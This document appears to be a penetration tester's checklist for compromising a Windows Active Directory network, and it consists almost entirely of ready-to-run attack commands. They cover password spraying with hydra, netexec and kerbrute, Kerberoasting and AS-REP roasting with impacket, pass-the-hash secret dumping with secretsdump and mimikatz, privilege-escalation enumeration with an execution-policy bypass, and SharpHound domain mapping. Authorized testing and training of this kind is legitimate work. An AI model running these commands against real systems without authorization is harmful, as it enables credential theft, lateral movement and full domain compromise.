Penetration Test Checklist
Unauthenticated Recon - Domain
Initial Compromise of Network
Windows Privilege Escalation
Harvested a New Credential
Make sure to test twice: once against the domain and once with "--local-auth" to test local user passwords.
Spray Passwords
$ hydra -l "yoshi" -p 'Mushroom!' -M ips.txt rdp
$ netexec smb ips.txt -u users.txt -p passwords.txt
$ netexec winrm ips.txt -u users.txt -p passwords.txt
$ netexec wmi ips.txt -u users.txt -p passwords.txt
$ netexec mssql ips.txt -u users.txt -p passwords.txt --local-auth
Manual spray (if the above didn't recover anything).
$ proxychains evil-winrm -i 10.10.93.154 -u Administrator -p "Passwords"
$ proxychains xfreerdp /v:10.10.93.154 /u:Administrator /p:password
Harvested Domain Credential
Kerbrute
$ proxychains kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
Kerberoast
$ proxychains impacket-GetUserSPNs -request -dc-ip 10.10.113.146 corp.com/web_svc
ASREP Roast
$ proxychains impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
Harvest new Hash
Harvested a new Private Key
Spray Intranet (.ssh)
If we have a shell on a box and notice a user has a private key in their home directory, we should test it against all computers with ssh open.
victim@host$ ssh -i id_rsa [email protected]
Popped a new Shell
Manual Enumeration
Domain Connected User
Check ACLs/ACEs
PWNED Shell? Dump Secrets!
$ proxychains impacket-secretsdump -hashes ":e728ecbadfb02f51ce8eed753f3ff3fd" [email protected]
PS> .\mimikatz.exe
Privilege Escalation - Windows
Automated Enumeration
PS> .\winPEASx64.exe
PS> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Manual Enumeration
systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Network Card(s)" /C:"Hotfix(s)"
whoami /priv
net user <user>
net localgroup administrators
cmd.exe /c dir /a C:\
ls "program files"
netstat -nao
.\SharpHound -c All --domain medtech.com --zipfilename MEDTECH.zip
Active Directory Lateral Movement